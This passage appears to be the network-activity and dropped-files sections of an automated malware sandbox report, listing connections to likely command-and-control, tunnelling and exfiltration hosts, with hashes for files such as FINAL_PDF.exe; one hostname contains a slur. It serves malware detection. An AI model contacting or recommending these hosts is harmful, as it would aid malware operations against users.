| US | 8.8.8.8:53 | a23uuu1.oss-cn-hongkong.aliyuncs.com | udp |
| FI | 95.217.25.228:443 | tcp | |
| HK | 47.79.66.210:80 | a23uuu1.oss-cn-hongkong.aliyuncs.com | tcp |
| TH | 103.230.121.81:30220 | iam.nigga.dad | tcp |
| RU | 83.239.55.170:40500 | udp | |
| US | 8.8.8.8:53 | 210.66.79.47.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.55.239.83.in-addr.arpa | udp |
| CN | 111.231.145.137:8888 | tcp | |
| DE | 167.71.56.116:22764 | tcp | |
| GB | 88.221.135.11:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | exonic-hacks.com | udp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| GB | 88.221.135.11:443 | r.bing.com | udp |
| GB | 88.221.135.34:443 | th.bing.com | tcp |
| US | 148.163.102.170:4782 | tcp | |
| GB | 88.221.135.33:443 | th.bing.com | tcp |
| GB | 88.221.135.33:443 | th.bing.com | tcp |
| GB | 88.221.135.34:443 | th.bing.com | tcp |
| US | 8.8.8.8:53 | 11.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.135.221.88.in-addr.arpa | udp |
| GB | 88.221.135.33:443 | th.bing.com | udp |
| GB | 88.221.135.34:443 | th.bing.com | udp |
| US | 8.8.8.8:53 | applications-scenario.gl.at.ply.gg | udp |
| US | 147.185.221.21:53694 | applications-scenario.gl.at.ply.gg | tcp |
| UZ | 90.156.164.28:40500 | udp | |
| US | 8.8.8.8:53 | login.microsoftonline.com | udp |
| NL | 40.126.32.72:443 | login.microsoftonline.com | tcp |
| RU | 91.240.118.204:8000 | 91.240.118.204 | tcp |
| US | 8.8.8.8:53 | navegacionseguracol24vip.org | udp |
| CO | 181.131.217.244:30201 | navegacionseguracol24vip.org | tcp |
| FR | 89.156.24.108:1738 | tcp | |
| US | 8.8.8.8:53 | 28.164.156.90.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 204.118.240.91.in-addr.arpa | udp |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 0.tcp.in.ngrok.io | udp |
| IN | 3.6.231.193:15792 | 0.tcp.in.ngrok.io | tcp |
| RU | 94.198.55.181:4337 | tcp | |
| DE | 167.71.56.116:22764 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 8.8.8.8:53 | 181.55.198.94.in-addr.arpa | udp |
| GB | 82.117.243.110:5173 | tcp | |
| RU | 185.81.68.147:1912 | tcp | |
| TH | 103.230.121.81:30220 | iam.nigga.dad | tcp |
| US | 8.8.8.8:53 | 237.21.107.13.in-addr.arpa | udp |
| DZ | 41.200.68.144:40500 | udp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 8.8.8.8:53 | egorepetiiiosn.shop | udp |
| US | 8.8.8.8:53 | 144.68.200.41.in-addr.arpa | udp |
| US | 8.8.8.8:53 | shelterryujxo.shop | udp |
| US | 8.8.8.8:53 | chequedxmznp.shop | udp |
| US | 8.8.8.8:53 | illnesmunxkza.shop | udp |
| TM | 91.202.233.141:80 | 91.202.233.141 | tcp |
| US | 8.8.8.8:53 | triallyforwhgh.shop | udp |
| US | 8.8.8.8:53 | shootydowtqosm.shop | udp |
| US | 8.8.8.8:53 | faceddullinhs.shop | udp |
| US | 8.8.8.8:53 | infect-crackle.cyou | udp |
| US | 8.8.8.8:53 | ammycanedpors.shop | udp |
| US | 8.8.8.8:53 | se-blurry.biz | udp |
| GB | 104.124.170.33:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | zinc-sneark.biz | udp |
| US | 8.8.8.8:53 | dwell-exclaim.biz | udp |
| IN | 3.6.231.193:15792 | 0.tcp.in.ngrok.io | tcp |
| US | 8.8.8.8:53 | formy-spill.biz | udp |
| US | 8.8.8.8:53 | covery-mover.biz | udp |
| US | 8.8.8.8:53 | dare-curbys.biz | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 8.8.8.8:53 | print-vexer.biz | udp |
| US | 8.8.8.8:53 | impend-differ.biz | udp |
| GB | 104.124.170.33:443 | steamcommunity.com | tcp |
| US | 148.163.102.170:4782 | tcp | |
| HK | 47.238.55.14:5555 | tcp | |
| DE | 167.71.56.116:22764 | tcp | |
| CO | 181.131.217.244:30201 | navegacionseguracol24vip.org | tcp |
| TH | 103.230.121.81:30220 | iam.nigga.dad | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | newstaticfreepoint24.ddns-ip.net | udp |
| GB | 104.124.170.33:443 | steamcommunity.com | tcp |
| CO | 181.131.217.244:1842 | newstaticfreepoint24.ddns-ip.net | tcp |
| FI | 95.217.25.228:443 | tcp | |
| IN | 3.6.231.193:15792 | 0.tcp.in.ngrok.io | tcp |
| DE | 167.71.56.116:22764 | tcp | |
| CO | 181.131.217.244:30201 | newstaticfreepoint24.ddns-ip.net | tcp |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| US | 148.163.102.170:4782 | tcp | |
| RU | 185.81.68.147:1912 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| NL | 45.136.51.217:2222 | tcp | |
| CN | 183.57.21.131:8095 | tcp | |
| US | 8.8.8.8:53 | 123.156.64.82.in-addr.arpa | udp |
| TH | 103.230.121.81:30220 | iam.nigga.dad | tcp |
| DE | 167.71.56.116:22764 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 8.8.8.8:53 | pentestfiles.s3.amazonaws.com | udp |
| US | 52.216.37.65:80 | pentestfiles.s3.amazonaws.com | tcp |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| RU | 185.81.68.148:80 | 185.81.68.148 | tcp |
| US | 8.8.8.8:53 | faulteyotk.site | udp |
| US | 8.8.8.8:53 | seallysl.site | udp |
| US | 8.8.8.8:53 | opposezmny.site | udp |
| US | 8.8.8.8:53 | goalyfeastz.site | udp |
| US | 8.8.8.8:53 | contemteny.site | udp |
| US | 8.8.8.8:53 | dilemmadu.site | udp |
| US | 8.8.8.8:53 | 65.37.216.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 148.68.81.185.in-addr.arpa | udp |
| FR | 82.64.156.123:80 | tcp | |
| US | 8.8.8.8:53 | authorisev.site | udp |
| US | 8.8.8.8:53 | servicedny.site | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 104.124.170.33:443 | steamcommunity.com | tcp |
| FR | 82.64.156.123:80 | tcp | |
| IN | 3.6.231.193:15792 | 0.tcp.in.ngrok.io | tcp |
| CO | 181.131.217.244:30201 | newstaticfreepoint24.ddns-ip.net | tcp |
| FR | 89.156.24.108:1738 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| DE | 167.71.56.116:22764 | tcp | |
| US | 8.8.8.8:53 | uXPSmpVlnejowfEuOvrjEhYZ.uXPSmpVlnejowfEuOvrjEhYZ | udp |
| FR | 82.64.156.123:80 | tcp | |
| US | 147.185.221.21:53694 | applications-scenario.gl.at.ply.gg | tcp |
| GB | 82.117.243.110:5173 | tcp | |
| US | 8.8.8.8:53 | camp.zapto.org | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| TH | 103.230.121.81:30220 | iam.nigga.dad | tcp |
| KR | 152.67.212.187:443 | 152.67.212.187 | tcp |
| DE | 167.71.56.116:22764 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| IN | 3.6.231.193:15792 | 0.tcp.in.ngrok.io | tcp |
| RU | 185.81.68.148:80 | 185.81.68.148 | tcp |
| FR | 82.64.156.123:80 | tcp | |
| DE | 167.71.56.116:22764 | tcp | |
| RU | 185.81.68.147:1912 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| CO | 181.131.217.244:30201 | newstaticfreepoint24.ddns-ip.net | tcp |
| FR | 82.64.156.123:80 | tcp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| GB | 104.124.170.33:443 | steamcommunity.com | tcp |
| TH | 103.230.121.81:30220 | iam.nigga.dad | tcp |
| US | 148.163.102.170:4782 | tcp | |
| FI | 95.217.25.228:443 | tcp | |
| CO | 181.131.217.244:1842 | newstaticfreepoint24.ddns-ip.net | tcp |
| HK | 47.238.55.14:5555 | tcp | |
| DE | 167.71.56.116:22764 | tcp | |
| US | 8.8.8.8:53 | ser.nrovn.xyz | udp |
| VN | 103.77.173.146:80 | ser.nrovn.xyz | tcp |
| FR | 82.64.156.123:80 | tcp | |
| CO | 181.131.217.244:30201 | newstaticfreepoint24.ddns-ip.net | tcp |
| US | 8.8.8.8:53 | 146.173.77.103.in-addr.arpa | udp |
| IN | 3.6.231.193:15792 | 0.tcp.in.ngrok.io | tcp |
| CN | 183.57.21.131:8095 | tcp | |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| RU | 185.81.68.148:80 | 185.81.68.148 | tcp |
| DE | 167.71.56.116:22764 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| NL | 45.136.51.217:2222 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| TH | 103.230.121.81:30220 | iam.nigga.dad | tcp |
| FR | 89.156.24.108:1738 | tcp | |
| DE | 167.71.56.116:22764 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| FR | 82.64.156.123:80 | tcp | |
| IN | 3.6.231.193:15792 | 0.tcp.in.ngrok.io | tcp |
| US | 8.8.8.8:53 | status.mycompliancereports.com | udp |
| CA | 35.183.28.21:80 | status.mycompliancereports.com | tcp |
| CO | 181.131.217.244:30201 | newstaticfreepoint24.ddns-ip.net | tcp |
| RU | 185.215.113.36:80 | 185.215.113.36 | tcp |
| US | 148.163.102.170:4782 | tcp | |
| US | 8.8.8.8:53 | 21.28.183.35.in-addr.arpa | udp |
| FR | 82.64.156.123:80 | tcp | |
| DE | 167.71.56.116:22764 | tcp | |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| US | 8.8.8.8:53 | d2e5gvivzj4g90.cloudfront.net | udp |
| US | 8.8.8.8:53 | 36.113.215.185.in-addr.arpa | udp |
| FR | 18.164.55.74:443 | d2e5gvivzj4g90.cloudfront.net | tcp |
| VN | 103.77.173.146:7707 | ser.nrovn.xyz | tcp |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| RU | 185.81.68.148:80 | 185.81.68.148 | tcp |
| US | 8.8.8.8:53 | 74.55.164.18.in-addr.arpa | udp |
| GB | 82.117.243.110:5173 | tcp | |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| RU | 185.81.68.148:80 | 185.81.68.148 | tcp |
| TH | 103.230.121.81:30220 | iam.nigga.dad | tcp |
| FR | 82.64.156.123:80 | tcp | |
| US | 8.8.8.8:53 | condition-clearance.gl.at.ply.gg | udp |
| US | 147.185.221.19:7070 | condition-clearance.gl.at.ply.gg | tcp |
| RU | 31.41.244.11:80 | 31.41.244.11 | tcp |
| US | 8.8.8.8:53 | home.sevjs17sr.top | udp |
| US | 8.8.8.8:53 | 11.244.41.31.in-addr.arpa | udp |
| US | 147.185.221.21:53694 | applications-scenario.gl.at.ply.gg | tcp |
| DE | 167.71.56.116:22764 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 148.163.102.170:4782 | tcp | |
| IN | 3.6.231.193:15792 | 0.tcp.in.ngrok.io | tcp |
| FR | 82.64.156.123:80 | tcp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| CO | 181.131.217.244:1842 | newstaticfreepoint24.ddns-ip.net | tcp |
| US | 8.8.8.8:53 | ajax.googleapis.com | udp |
| US | 8.8.8.8:53 | lipis.github.io | udp |
| US | 8.8.8.8:53 | cdnjs.cloudflare.com | udp |
| US | 8.8.8.8:53 | stackpath.bootstrapcdn.com | udp |
| US | 8.8.8.8:53 | gateway.discord.gg | udp |
| US | 185.199.110.153:443 | lipis.github.io | tcp |
| US | 104.17.24.14:443 | cdnjs.cloudflare.com | tcp |
| US | 104.17.24.14:443 | cdnjs.cloudflare.com | tcp |
| US | 104.18.10.207:443 | stackpath.bootstrapcdn.com | tcp |
| FR | 142.250.201.170:443 | ajax.googleapis.com | tcp |
| US | 162.159.130.234:443 | gateway.discord.gg | tcp |
| DE | 167.71.56.116:22764 | tcp | |
| US | 185.199.110.153:443 | lipis.github.io | tcp |
| US | 8.8.8.8:53 | 153.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.24.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 207.10.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.201.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.130.159.162.in-addr.arpa | udp |
| FR | 82.64.156.123:80 | tcp | |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| RU | 185.81.68.148:80 | 185.81.68.148 | tcp |
| TH | 103.230.121.81:30220 | iam.nigga.dad | tcp |
| CN | 183.57.21.131:8095 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| RU | 185.81.68.148:80 | 185.81.68.148 | tcp |
| HK | 47.238.55.14:5555 | tcp | |
| FR | 194.59.30.220:1336 | tcp | |
| RU | 31.41.244.12:80 | 31.41.244.12 | tcp |
| DE | 167.71.56.116:22764 | tcp | |
| CO | 181.131.217.244:30201 | newstaticfreepoint24.ddns-ip.net | tcp |
| FR | 82.64.156.123:80 | tcp | |
| US | 8.8.8.8:53 | 12.244.41.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.tcp.in.ngrok.io | udp |
| IN | 35.154.189.194:15792 | 0.tcp.in.ngrok.io | tcp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| FR | 142.250.75.238:443 | drive.google.com | tcp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| FR | 142.250.179.67:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| FR | 142.250.179.67:80 | o.pki.goog | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| FR | 142.250.74.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 238.75.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.74.250.142.in-addr.arpa | udp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| FR | 82.64.156.123:80 | tcp | |
| US | 8.8.8.8:53 | ajsinvestment.org | udp |
| NL | 45.136.51.217:2222 | tcp | |
| BG | 87.120.120.26:5959 | ajsinvestment.org | tcp |
| DE | 167.71.56.116:22764 | tcp | |
| FR | 89.156.24.108:1738 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| TH | 103.230.121.81:30220 | iam.nigga.dad | tcp |
| FR | 82.64.156.123:80 | tcp | |
| IN | 35.154.189.194:15792 | 0.tcp.in.ngrok.io | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| CO | 181.131.217.244:30201 | newstaticfreepoint24.ddns-ip.net | tcp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | r11.o.lencr.org | udp |
| GB | 88.221.134.91:80 | r11.o.lencr.org | tcp |
| US | 66.45.226.53:7777 | 66.45.226.53 | tcp |
| US | 8.8.8.8:53 | 91.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.226.45.66.in-addr.arpa | udp |
| RU | 94.143.243.155:9001 | tcp | |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| RU | 212.109.16.228:21 | tcp | |
| RU | 212.109.2.201:8001 | 212.109.2.201 | tcp |
| RU | 217.77.58.161:80 | tcp | |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| RU | 217.77.48.229:80 | tcp | |
| RU | 217.77.62.113:8000 | tcp | |
| RU | 212.109.16.100:80 | tcp | |
| RU | 217.77.61.58:8291 | tcp | |
| RU | 185.9.80.66:9001 | 185.9.80.66 | tcp |
| RU | 217.77.48.179:22 | tcp | |
| DE | 167.71.56.116:22764 | tcp | |
| US | 8.8.8.8:53 | 155.243.143.94.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.2.109.212.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.80.9.185.in-addr.arpa | udp |
| KR | 152.67.212.187:443 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| GB | 82.117.243.110:5173 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 147.185.221.19:7070 | condition-clearance.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| VN | 103.77.173.146:7707 | ser.nrovn.xyz | tcp |
| DE | 167.71.56.116:22764 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| TH | 103.230.121.81:30220 | iam.nigga.dad | tcp |
| FR | 142.250.75.238:443 | drive.google.com | tcp |
| US | 147.185.221.21:53694 | applications-scenario.gl.at.ply.gg | tcp |
| FR | 142.250.74.225:443 | drive.usercontent.google.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 104.26.12.205:443 | api.ipify.org | tcp |
| CO | 181.131.217.244:30201 | newstaticfreepoint24.ddns-ip.net | tcp |
| US | 8.8.8.8:53 | api.gofile.io | udp |
| FR | 45.112.123.126:443 | api.gofile.io | tcp |
| US | 8.8.8.8:53 | geolocation-db.com | udp |
| DE | 159.89.102.253:443 | geolocation-db.com | tcp |
| FR | 31.14.70.245:443 | store4.gofile.io | tcp |
| CO | 181.131.217.244:1842 | newstaticfreepoint24.ddns-ip.net | tcp |
| US | 8.8.8.8:53 | 205.12.26.104.in-addr.arpa | udp |
| US | 162.159.138.232:443 | discord.com | tcp |
| FR | 31.14.70.245:443 | store4.gofile.io | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| US | 148.163.102.170:4782 | tcp | |
| DE | 167.71.56.116:22764 | tcp | |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | drive-connect.cyou | udp |
| US | 172.67.139.78:443 | drive-connect.cyou | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | se-blurry.biz | udp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | zinc-sneark.biz | udp |
| US | 8.8.8.8:53 | dwell-exclaim.biz | udp |
| US | 8.8.8.8:53 | formy-spill.biz | udp |
| US | 8.8.8.8:53 | covery-mover.biz | udp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | dare-curbys.biz | udp |
| US | 8.8.8.8:53 | 78.139.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | print-vexer.biz | udp |
| FR | 31.14.70.245:443 | store4.gofile.io | tcp |
| US | 8.8.8.8:53 | impend-differ.biz | udp |
| IN | 35.154.189.194:15792 | 0.tcp.in.ngrok.io | tcp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| FR | 82.64.156.123:80 | tcp | |
| GB | 104.124.170.33:443 | steamcommunity.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 144.172.71.105:1338 | 144.172.71.105 | tcp |
| FR | 31.14.70.245:443 | store4.gofile.io | tcp |
| US | 8.8.8.8:53 | 105.71.172.144.in-addr.arpa | udp |
| FR | 31.14.70.245:443 | store4.gofile.io | tcp |
| FR | 31.14.70.245:443 | store4.gofile.io | tcp |
| FR | 31.14.70.245:443 | store4.gofile.io | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| CO | 181.131.217.244:30201 | newstaticfreepoint24.ddns-ip.net | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | a1060630.xsph.ru | udp |
| RU | 141.8.192.138:80 | a1060630.xsph.ru | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| FR | 82.64.156.123:80 | tcp | |
| DE | 167.71.56.116:22764 | tcp | |
| US | 144.172.71.105:1338 | 144.172.71.105 | tcp |
| US | 8.8.8.8:53 | 138.192.8.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ftp.ywxww.net | udp |
| US | 8.8.8.8:53 | camp.zapto.org | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| CN | 60.191.208.187:820 | ftp.ywxww.net | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| TH | 103.230.121.81:30220 | iam.nigga.dad | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| FR | 142.250.75.238:443 | drive.google.com | tcp |
| US | 148.163.102.170:4782 | tcp | |
| US | 162.159.138.232:443 | discord.com | tcp |
| FR | 142.250.74.225:443 | drive.usercontent.google.com | tcp |
| HK | 47.238.55.14:5555 | tcp | |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| N/A | 192.168.31.99:4782 | tcp | |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:80 | github.com | tcp |
| US | 8.8.8.8:53 | ipwho.is | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| DE | 195.201.57.90:80 | ipwho.is | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 90.57.201.195.in-addr.arpa | udp |
| US | 162.159.138.232:443 | discord.com | tcp |
| FR | 82.64.156.123:80 | tcp | |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 154.216.17.90:80 | tcp | |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| IN | 35.154.189.194:15792 | 0.tcp.in.ngrok.io | tcp |
| DE | 167.71.56.116:22764 | tcp | |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| RU | 185.209.160.70:80 | tcp | |
| FR | 89.156.24.108:1738 | tcp | |
| NL | 45.136.51.217:2222 | tcp | |
| RU | 176.113.115.19:80 | 176.113.115.19 | tcp |
| FR | 82.64.156.123:80 | tcp | |
| US | 8.8.8.8:53 | 19.115.113.176.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.speak-a-message.com | udp |
| DE | 195.201.119.163:80 | www.speak-a-message.com | tcp |
| US | 8.8.8.8:53 | 163.119.201.195.in-addr.arpa | udp |
| US | 148.163.102.170:4782 | tcp | |
| DE | 167.71.56.116:22764 | tcp | |
| US | 8.8.8.8:53 | josecaceresport.duckdns.org | udp |
| BG | 87.120.116.122:5959 | josecaceresport.duckdns.org | tcp |
| TH | 103.230.121.81:30220 | iam.nigga.dad | tcp |
| US | 8.8.8.8:53 | jrqh-hk.com | udp |
| CN | 123.136.92.99:80 | jrqh-hk.com | tcp |
| FR | 82.64.156.123:80 | tcp | |
| US | 8.8.8.8:53 | 99.92.136.123.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sordid-snaked.cyou | udp |
| US | 8.8.8.8:53 | immureprech.biz | udp |
| US | 172.67.207.38:443 | immureprech.biz | tcp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 8.8.8.8:53 | deafeninggeh.biz | udp |
| US | 104.21.32.1:443 | deafeninggeh.biz | tcp |
| US | 8.8.8.8:53 | effecterectz.xyz | udp |
| IN | 35.154.189.194:15792 | 0.tcp.in.ngrok.io | tcp |
| US | 8.8.8.8:53 | debonairnukk.xyz | udp |
| US | 8.8.8.8:53 | wrathful-jammy.cyou | udp |
| US | 8.8.8.8:53 | awake-weaves.cyou | udp |
| GB | 104.124.170.33:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | 38.207.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.32.21.104.in-addr.arpa | udp |
| DE | 167.71.56.116:22764 | tcp | |
| US | 147.185.221.19:7070 | condition-clearance.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 9.179.89.13.in-addr.arpa | udp |
| FR | 82.64.156.123:80 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| GB | 82.117.243.110:5173 | tcp | |
| CO | 181.131.217.244:30201 | newstaticfreepoint24.ddns-ip.net | tcp |
| CO | 181.131.217.244:1842 | newstaticfreepoint24.ddns-ip.net | tcp |
| VN | 103.77.173.146:8808 | ser.nrovn.xyz | tcp |
| US | 8.8.8.8:53 | download.emailorganizer.com | udp |
| NL | 190.2.142.115:80 | download.emailorganizer.com | tcp |
| DE | 167.71.56.116:22764 | tcp | |
| TH | 103.230.121.81:30220 | iam.nigga.dad | tcp |
| FR | 82.64.156.123:80 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 147.185.221.21:53694 | applications-scenario.gl.at.ply.gg | tcp |
| BG | 87.120.116.122:5959 | josecaceresport.duckdns.org | tcp |
| N/A | 192.168.56.1:4782 | tcp | |
| IN | 35.154.189.194:15792 | 0.tcp.in.ngrok.io | tcp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 148.163.102.170:4782 | tcp | |
| CO | 181.131.217.244:30201 | newstaticfreepoint24.ddns-ip.net | tcp |
| FR | 82.64.156.123:80 | tcp | |
| RU | 31.41.244.10:80 | 31.41.244.10 | tcp |
| DE | 167.71.56.116:22764 | tcp | |
| US | 8.8.8.8:53 | 10.244.41.31.in-addr.arpa | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| FR | 82.64.156.123:80 | tcp | |
| TH | 103.230.121.81:30220 | iam.nigga.dad | tcp |
| DE | 167.71.56.116:22764 | tcp | |
| RU | 185.209.160.70:80 | tcp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d28a889fd956d5cb3accfbaf1143eb6f |
| SHA1 | 157ba54b365341f8ff06707d996b3635da8446f7 |
| SHA256 | 21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45 |
| SHA512 | 0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c |
C:\Users\Admin\Desktop\New Text Document mod.exse\a\FINAL_PDF.exe
| MD5 | 290905106503753d8bd791403e04fb04 |
| SHA1 | a9ba718e1742482506325c18b3559f2282528343 |
| SHA256 | 32e950b63131f1aaf640047618a1ac8e380131c01d5a1a823dce9711308272e3 |
| SHA512 | e2006e865ecfbcd96a3700ff81ddbe49f62c237454b0ba50992b2e74c5db661d41363fee0192b19c564047017fc67a3a1608a9570672211f81dcf40aaed9ab3e |
memory/1612-115-0x0000000000EC0000-0x000000000105C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 057e7742b25e65a341d1341da25b54a8 |
| SHA1 | 65c874ac4f429a4172bdf89a73922e39873ecab6 |
| SHA256 | f8cf996545599e442f94820af5c724fca27d22de96bcef6aa308d0520c3a1468 |
| SHA512 | 94b461e3705336b9ebf10df506f4a436cee20ac60540cfb6fd2f36c48e011836bf1f9e3f00e5b254ad6e6f1338a976dba495d398b4459687f518e815afde04e7 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 370bda353311eb9449849db3925e66a8 |
| SHA1 | abfeb8ff8dde460fc35889f241851fc04ec72f47 |
| SHA256 | 7bd864327e28e3d12a85d4b151515e4adacddbd946a9c2d8b6e70d3da4b193c2 |
| SHA512 | fba6a6c336d82d549f9ddea4c11a3db973d1a39dbc6a7624637695565c3a90a534ccfe82a0240167f5dc9e029d9f0ae9c97fefe36960b442279c5cb964753cda |
C:\Users\Admin\AppData\Local\Temp\614016133.exe
| MD5 | 84897ca8c1aa06b33248956ac25ec20a |
| SHA1 | 544d5d5652069b3c5e7e29a1ca3eea46b227bbfe |
| SHA256 | 023ad16f761a35bd7934e392bcf2bbf702f525303b2964e97c3e50d2d5f3eda1 |
